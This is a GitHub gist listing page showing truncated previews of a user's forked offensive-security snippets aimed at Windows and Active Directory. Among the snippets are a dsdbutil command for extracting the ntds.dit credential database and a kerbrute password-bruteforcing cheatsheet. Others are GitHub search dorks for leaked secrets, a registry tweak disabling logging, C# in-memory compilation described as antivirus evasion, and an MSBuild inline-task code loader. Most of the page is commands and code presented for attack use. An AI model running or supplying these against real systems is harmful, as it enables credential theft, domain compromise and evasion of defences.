Skip to content

Instantly share code, notes, and snippets.

💭
I may be slow to respond.

sasqwatch

💭
I may be slow to respond.
Block or report user

Report or block sasqwatch

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@sasqwatch
sasqwatch / dsdbutil.exe
Created Sep 16, 2019 — forked from bohops/dsdbutil.exe
yet another native AD database extraction utility
View dsdbutil.exe
DSDButil
========
- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
@sasqwatch
sasqwatch / kerberos_attacks_cheatsheet.md
Created Sep 4, 2019 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@sasqwatch
sasqwatch / FindingComputersWithLocalAdmin.md
Created Aug 30, 2019 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
View FindingComputersWithLocalAdmin.md

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

@sasqwatch
sasqwatch / auto_git_query
Created Aug 28, 2019 — forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
View auto_git_query
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@sasqwatch
sasqwatch / UserWritableLocations.ps1
Created Aug 19, 2019 — forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
View UserWritableLocations.ps1
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
"C:\Windows"
)
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
@sasqwatch
sasqwatch / UserWritableLocations.ps1
Created Aug 19, 2019
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
View UserWritableLocations.ps1
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
"C:\Windows"
)
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
View Disable-Fusion-Log-.NET-Assembly-Binding-Logging.bat
reg add "HKLM\Software\Microsoft\Fusion" /v EnableLog /t REG_DWORD /d 0 /f
@sasqwatch
sasqwatch / CompileInMemory.cs
Created Aug 19, 2019 — forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/ However, this will still execute csc.exe and drop a dll to %temp% https://twitter.com/Laughing_Mantis/status/991018563296157696
View CompileInMemory.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
{
class Program
@sasqwatch
sasqwatch / JankyAF.csproj
Created Aug 19, 2019 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@sasqwatch
sasqwatch / wifiscan.cmd
Created Aug 15, 2019 — forked from joswr1ght/wifiscan.cmd
Wi-Fi Scanning at the Windows Command Prompt, FOR loop style
View wifiscan.cmd
FOR /L %N IN () DO @netsh wlan show networks mode=bssid | findstr "^SSID Signal" && ping -n 16 127.0.0.1 >NUL && cls
You can’t perform that action at this time.